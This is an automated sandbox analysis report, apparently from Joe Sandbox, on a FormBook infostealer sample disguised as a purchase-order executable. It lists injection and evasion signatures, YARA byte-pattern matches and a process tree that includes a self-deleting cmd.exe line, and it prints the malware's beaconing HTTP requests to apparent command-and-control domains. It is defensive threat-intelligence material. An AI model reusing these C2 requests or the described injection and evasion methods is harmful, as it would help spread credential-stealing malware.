Loading ...

Play interactive tourEdit tour

Analysis Report Purchase Order 40,7045$.exe

Overview

General Information

Sample Name:Purchase Order 40,7045$.exe
Analysis ID:321389
MD5:ba4f1b472cb69d8a3924d88dacf1b833
SHA1:622cdccdc0f020d368a87c5eff9ec1a1259e21c7
SHA256:2a694c3a8347816b2f85e036b1064e410ad1578185a0608416944199ef72b82c
Tags:exeFormbookYahoo

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM_3
Yara detected FormBook
.NET source code contains potential unpacker
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • Purchase Order 40,7045$.exe (PID: 6708 cmdline: 'C:\Users\user\Desktop\Purchase Order 40,7045$.exe' MD5: BA4F1B472CB69D8A3924D88DACF1B833)
    • MSBuild.exe (PID: 6748 cmdline: {path} MD5: D621FD77BD585874F9686D3A76462EF1)
      • explorer.exe (PID: 3472 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • raserver.exe (PID: 7048 cmdline: C:\Windows\SysWOW64\raserver.exe MD5: 2AADF65E395BFBD0D9B71D7279C8B5EC)
          • cmd.exe (PID: 6200 cmdline: /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6268 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000002.289490288.00000000011C0000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000001.00000002.289490288.00000000011C0000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x83d8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8772:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x14085:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x13b71:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x14187:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x142ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x917a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x12dec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0x9ef2:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19167:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a1da:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000001.00000002.289490288.00000000011C0000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x16089:$sqlite3step: 68 34 1C 7B E1
    • 0x1619c:$sqlite3step: 68 34 1C 7B E1
    • 0x160b8:$sqlite3text: 68 38 2A 90 C5
    • 0x161dd:$sqlite3text: 68 38 2A 90 C5
    • 0x160cb:$sqlite3blob: 68 53 D8 7F 8C
    • 0x161f3:$sqlite3blob: 68 53 D8 7F 8C
    00000006.00000002.521320039.0000000000660000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000006.00000002.521320039.0000000000660000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x83d8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8772:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x14085:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x13b71:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x14187:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x142ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x917a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x12dec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0x9ef2:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19167:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1a1da:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 18 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      1.2.MSBuild.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        1.2.MSBuild.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x75d8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x7972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x13285:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x12d71:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x13387:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x134ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x837a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x11fec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x90f2:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x18367:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x193da:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        1.2.MSBuild.exe.400000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x15289:$sqlite3step: 68 34 1C 7B E1
        • 0x1539c:$sqlite3step: 68 34 1C 7B E1
        • 0x152b8:$sqlite3text: 68 38 2A 90 C5
        • 0x153dd:$sqlite3text: 68 38 2A 90 C5
        • 0x152cb:$sqlite3blob: 68 53 D8 7F 8C
        • 0x153f3:$sqlite3blob: 68 53 D8 7F 8C
        1.2.MSBuild.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          1.2.MSBuild.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x83d8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8772:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x14085:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x13b71:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x14187:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x142ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x917a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x12dec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0x9ef2:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x19167:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1a1da:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 1 entries

          Sigma Overview

          No Sigma rule has matched

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Antivirus detection for URL or domainShow sources
          Source: http://www.allmm.info/igqu/?1b3H_Ni=4PnhXD1XQOAEhvyRg6knEMy8erSWBtwfFfVfV7Yg7HuI1lqkNO9tokZPvE8hw33lw/Tr&JXhpvv=OXXTgtL8CzU0PRx0Avira URL Cloud: Label: malware
          Source: http://www.forbigdogs.com/igqu/?1b3H_Ni=hqyhMfRLrOIQC7GjaQnjrCruer7JrdNhQeLxI9U0LsQdDm7qZoXdq0VVbkb5+tb+Xu86&JXhpvv=OXXTgtL8CzU0PRx0Avira URL Cloud: Label: malware
          Multi AV Scanner detection for submitted fileShow sources
          Source: Purchase Order 40,7045$.exeReversingLabs: Detection: 18%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000001.00000002.289490288.00000000011C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.521320039.0000000000660000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.260425222.0000000003D51000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.521773301.0000000000950000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.289472822.0000000001190000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.289268123.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.521861519.0000000000980000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 1.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Machine Learning detection for sampleShow sources
          Source: Purchase Order 40,7045$.exeJoe Sandbox ML: detected
          Source: 1.2.MSBuild.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then pop edi1_2_00415044
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then pop edi1_2_00415C88
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then pop ebx1_2_004066DA
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 4x nop then pop edi6_2_00675044
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 4x nop then pop edi6_2_00675C88
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 4x nop then pop ebx6_2_006666DA

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.102.136.180:80 -> 192.168.2.5:49747
          Source: TrafficSnort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.102.136.180:80 -> 192.168.2.5:49756
          Source: TrafficSnort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.102.136.180:80 -> 192.168.2.5:49758
          Source: TrafficSnort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.102.136.180:80 -> 192.168.2.5:49759
          Source: global trafficHTTP traffic detected: GET /igqu/?1b3H_Ni=b5xSTUUVmbOqauvhDdE25zWaspHItZbymNmRh6QlTutVQGy0NN3SxEYa8xt/OgRWZ9lL&JXhpvv=OXXTgtL8CzU0PRx0 HTTP/1.1Host: www.ariasu-nakanokaikei.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /igqu/?1b3H_Ni=Jn5Vr1+14bH3XXZofqraFeWVa26wP8rJvzlWs5bnBoBEHljdRY0tb4g4rLkzBbL1dWSS&JXhpvv=OXXTgtL8CzU0PRx0 HTTP/1.1Host: www.allan-wren.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /igqu/?1b3H_Ni=7TsZUea1gk4hSEvdc6EZbm1J0Wfs+lYlHRlJN5vF1TH1x8D6KkvV8DgWQzT8NLbVi8yc&JXhpvv=OXXTgtL8CzU0PRx0 HTTP/1.1Host: www.theoutdoorbed.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /igqu/?1b3H_Ni=YEhaVrRn7U1iAIlzVSLmJg7Vd2zqgykvRGHwZQMAJohu7B6Tc4aodga4QJg4WZr1G+1s&JXhpvv=OXXTgtL8CzU0PRx0 HTTP/1.1Host: www.sweetbasilmarketing.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /igqu/?1b3H_Ni=cgoB+lenqGYlJtvc5JNC9VTF2CGbWvKagdSG/Om1O4x9+LG6GIhzUmnXZfPmgHDFLZxT&JXhpvv=OXXTgtL8CzU0PRx0 HTTP/1.1Host: www.pasumaisangam.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /igqu/?1b3H_Ni=4h23ofVf0wd/XYFA6lbDKykObBKMIHvT+gmvC/ZN8Gk4kRGXSO1DXfeAEBypKVKLfK2k&JXhpvv=OXXTgtL8CzU0PRx0 HTTP/1.1Host: www.justsoldbykristen.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /igqu/?1b3H_Ni=xBkCUm8FF1kjoaFXSBT5hrl7iUeljBCg0asG3x/fx29GNVo3vuMsob2h52kMpeSzyrJ8&JXhpvv=OXXTgtL8CzU0PRx0 HTTP/1.1Host: www.lotoencasa.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /igqu/?1b3H_Ni=KYQlcl9vZGj8bR01lvQ9gDl5O0hjo7xV5yl6UTMOowrmblKr/7vG5jbVDjpERd28t5Sb&JXhpvv=OXXTgtL8CzU0PRx0 HTTP/1.1Host: www.guidesgold.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /igqu/?1b3H_Ni=UOytMzsBKWezP+Z4jPobAURSNGb1svEAtMI07cL6UgNiZ1/Q1uLpHFW2AnXGybnNRzQX&JXhpvv=OXXTgtL8CzU0PRx0 HTTP/1.1Host: www.thoughtslate.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /igqu/?1b3H_Ni=K/S7l+gZOJHSbd5nxE/i7D8w4PbP25DXYiwy4kAXmG/uB5hJOsw6W9LAHGkKev0TSo0+&JXhpvv=OXXTgtL8CzU0PRx0 HTTP/1.1Host: www.chemtradent.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /igqu/?1b3H_Ni=ZRPeOuYuFqwCE6hLODJInGZZul3mSlUAF2kmaH+TgtUwwh/GNGVQ9RWrqwSZOKD9NgnN&JXhpvv=OXXTgtL8CzU0PRx0 HTTP/1.1Host: www.erpsystem.siteConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /igqu/?1b3H_Ni=hqyhMfRLrOIQC7GjaQnjrCruer7JrdNhQeLxI9U0LsQdDm7qZoXdq0VVbkb5+tb+Xu86&JXhpvv=OXXTgtL8CzU0PRx0 HTTP/1.1Host: www.forbigdogs.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /igqu/?1b3H_Ni=42cTP78OQQp4lToQAaTApkvzdS7tu3b97V7Z9hUZNPZ7GHRvcEVBBFWfORKXu9ozCmYh&JXhpvv=OXXTgtL8CzU0PRx0 HTTP/1.1Host: www.rockinglifefromhome.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /igqu/?1b3H_Ni=4PnhXD1XQOAEhvyRg6knEMy8erSWBtwfFfVfV7Yg7HuI1lqkNO9tokZPvE8hw33lw/Tr&JXhpvv=OXXTgtL8CzU0PRx0 HTTP/1.1Host: www.allmm.infoConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /igqu/?1b3H_Ni=b5xSTUUVmbOqauvhDdE25zWaspHItZbymNmRh6QlTutVQGy0NN3SxEYa8xt/OgRWZ9lL&JXhpvv=OXXTgtL8CzU0PRx0 HTTP/1.1Host: www.ariasu-nakanokaikei.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 81.169.145.95 81.169.145.95
          Source: Joe Sandbox ViewIP Address: 185.201.11.126 185.201.11.126
          Source: Joe Sandbox ViewASN Name: AMAZON-AESUS AMAZON-AESUS
          Source: Joe Sandbox ViewASN Name: IOFLOODUS IOFLOODUS
          Source: unknownTCP traffic detected without corresponding DNS query: 104.42.151.234
          Source: unknownTCP traffic detected without corresponding DNS query: 20.190.129.133
          Source: unknownTCP traffic detected without corresponding DNS query: 20.190.129.133
          Source: unknownTCP traffic detected without corresponding DNS query: 20.190.129.133
          Source: unknownTCP traffic detected without corresponding DNS query: 20.190.129.133
          Source: unknownTCP traffic detected without corresponding DNS query: 20.190.129.133
          Source: unknownTCP traffic detected without corresponding DNS query: 20.190.129.133
          Source: unknownTCP traffic detected without corresponding DNS query: 20.190.129.133
          Source: unknownTCP traffic detected without corresponding DNS query: 20.190.129.133
          Source: unknownTCP traffic detected without corresponding DNS query: 20.190.129.133
          Source: unknownTCP traffic detected without corresponding DNS query: 20.190.129.133
          Source: unknownTCP traffic detected without corresponding DNS query: 20.190.129.133
          Source: unknownTCP traffic detected without corresponding DNS query: 20.190.129.133
          Source: unknownTCP traffic detected without corresponding DNS query: 20.190.129.133
          Source: unknownTCP traffic detected without corresponding DNS query: 20.190.129.133
          Source: unknownTCP traffic detected without corresponding DNS query: 20.190.129.133
          Source: unknownTCP traffic detected without corresponding DNS query: 20.190.129.133
          Source: unknownTCP traffic detected without corresponding DNS query: 20.190.129.133
          Source: unknownTCP traffic detected without corresponding DNS query: 20.190.129.133
          Source: unknownTCP traffic detected without corresponding DNS query: 20.190.129.133
          Source: unknownTCP traffic detected without corresponding DNS query: 104.79.89.181
          Source: unknownTCP traffic detected without corresponding DNS query: 93.184.220.29
          Source: unknownTCP traffic detected without corresponding DNS query: 84.53.167.113
          Source: unknownTCP traffic detected without corresponding DNS query: 84.53.167.113
          Source: unknownTCP traffic detected without corresponding DNS query: 93.184.220.29
          Source: unknownTCP traffic detected without corresponding DNS query: 93.184.220.29
          Source: unknownTCP traffic detected without corresponding DNS query: 93.184.220.29
          Source: unknownTCP traffic detected without corresponding DNS query: 40.67.254.36
          Source: unknownTCP traffic detected without corresponding DNS query: 93.184.220.29
          Source: unknownTCP traffic detected without corresponding DNS query: 40.67.254.36
          Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
          Source: unknownTCP traffic detected without corresponding DNS query: 93.184.220.29
          Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
          Source: unknownTCP traffic detected without corresponding DNS query: 93.184.220.29
          Source: unknownTCP traffic detected without corresponding DNS query: 104.79.89.181
          Source: unknownTCP traffic detected without corresponding DNS query: 93.184.220.29
          Source: unknownTCP traffic detected without corresponding DNS query: 93.184.220.29
          Source: unknownTCP traffic detected without corresponding DNS query: 93.184.220.29
          Source: unknownTCP traffic detected without corresponding DNS query: 93.184.220.29
          Source: unknownTCP traffic detected without corresponding DNS query: 20.190.129.133
          Source: unknownTCP traffic detected without corresponding DNS query: 93.184.220.29
          Source: unknownTCP traffic detected without corresponding DNS query: 20.190.129.133
          Source: unknownTCP traffic detected without corresponding DNS query: 93.184.220.29
          Source: unknownTCP traffic detected without corresponding DNS query: 93.184.220.29
          Source: unknownTCP traffic detected without corresponding DNS query: 93.184.220.29
          Source: unknownTCP traffic detected without corresponding DNS query: 93.184.220.29
          Source: unknownTCP traffic detected without corresponding DNS query: 20.190.129.133
          Source: unknownTCP traffic detected without corresponding DNS query: 20.190.129.133
          Source: unknownTCP traffic detected without corresponding DNS query: 20.190.129.133
          Source: unknownTCP traffic detected without corresponding DNS query: 20.190.129.133
          Source: global trafficHTTP traffic detected: GET /igqu/?1b3H_Ni=b5xSTUUVmbOqauvhDdE25zWaspHItZbymNmRh6QlTutVQGy0NN3SxEYa8xt/OgRWZ9lL&JXhpvv=OXXTgtL8CzU0PRx0 HTTP/1.1Host: www.ariasu-nakanokaikei.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /igqu/?1b3H_Ni=Jn5Vr1+14bH3XXZofqraFeWVa26wP8rJvzlWs5bnBoBEHljdRY0tb4g4rLkzBbL1dWSS&JXhpvv=OXXTgtL8CzU0PRx0 HTTP/1.1Host: www.allan-wren.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /igqu/?1b3H_Ni=7TsZUea1gk4hSEvdc6EZbm1J0Wfs+lYlHRlJN5vF1TH1x8D6KkvV8DgWQzT8NLbVi8yc&JXhpvv=OXXTgtL8CzU0PRx0 HTTP/1.1Host: www.theoutdoorbed.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /igqu/?1b3H_Ni=YEhaVrRn7U1iAIlzVSLmJg7Vd2zqgykvRGHwZQMAJohu7B6Tc4aodga4QJg4WZr1G+1s&JXhpvv=OXXTgtL8CzU0PRx0 HTTP/1.1Host: www.sweetbasilmarketing.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /igqu/?1b3H_Ni=cgoB+lenqGYlJtvc5JNC9VTF2CGbWvKagdSG/Om1O4x9+LG6GIhzUmnXZfPmgHDFLZxT&JXhpvv=OXXTgtL8CzU0PRx0 HTTP/1.1Host: www.pasumaisangam.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /igqu/?1b3H_Ni=4h23ofVf0wd/XYFA6lbDKykObBKMIHvT+gmvC/ZN8Gk4kRGXSO1DXfeAEBypKVKLfK2k&JXhpvv=OXXTgtL8CzU0PRx0 HTTP/1.1Host: www.justsoldbykristen.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /igqu/?1b3H_Ni=xBkCUm8FF1kjoaFXSBT5hrl7iUeljBCg0asG3x/fx29GNVo3vuMsob2h52kMpeSzyrJ8&JXhpvv=OXXTgtL8CzU0PRx0 HTTP/1.1Host: www.lotoencasa.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /igqu/?1b3H_Ni=KYQlcl9vZGj8bR01lvQ9gDl5O0hjo7xV5yl6UTMOowrmblKr/7vG5jbVDjpERd28t5Sb&JXhpvv=OXXTgtL8CzU0PRx0 HTTP/1.1Host: www.guidesgold.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /igqu/?1b3H_Ni=UOytMzsBKWezP+Z4jPobAURSNGb1svEAtMI07cL6UgNiZ1/Q1uLpHFW2AnXGybnNRzQX&JXhpvv=OXXTgtL8CzU0PRx0 HTTP/1.1Host: www.thoughtslate.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /igqu/?1b3H_Ni=K/S7l+gZOJHSbd5nxE/i7D8w4PbP25DXYiwy4kAXmG/uB5hJOsw6W9LAHGkKev0TSo0+&JXhpvv=OXXTgtL8CzU0PRx0 HTTP/1.1Host: www.chemtradent.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /igqu/?1b3H_Ni=ZRPeOuYuFqwCE6hLODJInGZZul3mSlUAF2kmaH+TgtUwwh/GNGVQ9RWrqwSZOKD9NgnN&JXhpvv=OXXTgtL8CzU0PRx0 HTTP/1.1Host: www.erpsystem.siteConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /igqu/?1b3H_Ni=hqyhMfRLrOIQC7GjaQnjrCruer7JrdNhQeLxI9U0LsQdDm7qZoXdq0VVbkb5+tb+Xu86&JXhpvv=OXXTgtL8CzU0PRx0 HTTP/1.1Host: www.forbigdogs.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /igqu/?1b3H_Ni=42cTP78OQQp4lToQAaTApkvzdS7tu3b97V7Z9hUZNPZ7GHRvcEVBBFWfORKXu9ozCmYh&JXhpvv=OXXTgtL8CzU0PRx0 HTTP/1.1Host: www.rockinglifefromhome.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /igqu/?1b3H_Ni=4PnhXD1XQOAEhvyRg6knEMy8erSWBtwfFfVfV7Yg7HuI1lqkNO9tokZPvE8hw33lw/Tr&JXhpvv=OXXTgtL8CzU0PRx0 HTTP/1.1Host: www.allmm.infoConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /igqu/?1b3H_Ni=b5xSTUUVmbOqauvhDdE25zWaspHItZbymNmRh6QlTutVQGy0NN3SxEYa8xt/OgRWZ9lL&JXhpvv=OXXTgtL8CzU0PRx0 HTTP/1.1Host: www.ariasu-nakanokaikei.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: g.msn.com
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 21 Nov 2020 08:24:27 GMTServer: Apache/2.4.43 (Unix)Content-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
          Source: explorer.exe, 00000003.00000000.275549675.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: Purchase Order 40,7045$.exe, 00000000.00000002.259984630.0000000002D51000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: explorer.exe, 00000003.00000000.275549675.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000003.00000000.275549675.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 00000003.00000000.275549675.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000003.00000000.275549675.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: explorer.exe, 00000003.00000000.275549675.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: explorer.exe, 00000003.00000000.275549675.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: explorer.exe, 00000003.00000000.275549675.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: explorer.exe, 00000003.00000000.275549675.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: explorer.exe, 00000003.00000000.275549675.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: explorer.exe, 00000003.00000000.275549675.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: explorer.exe, 00000003.00000000.275549675.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 00000003.00000000.275549675.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
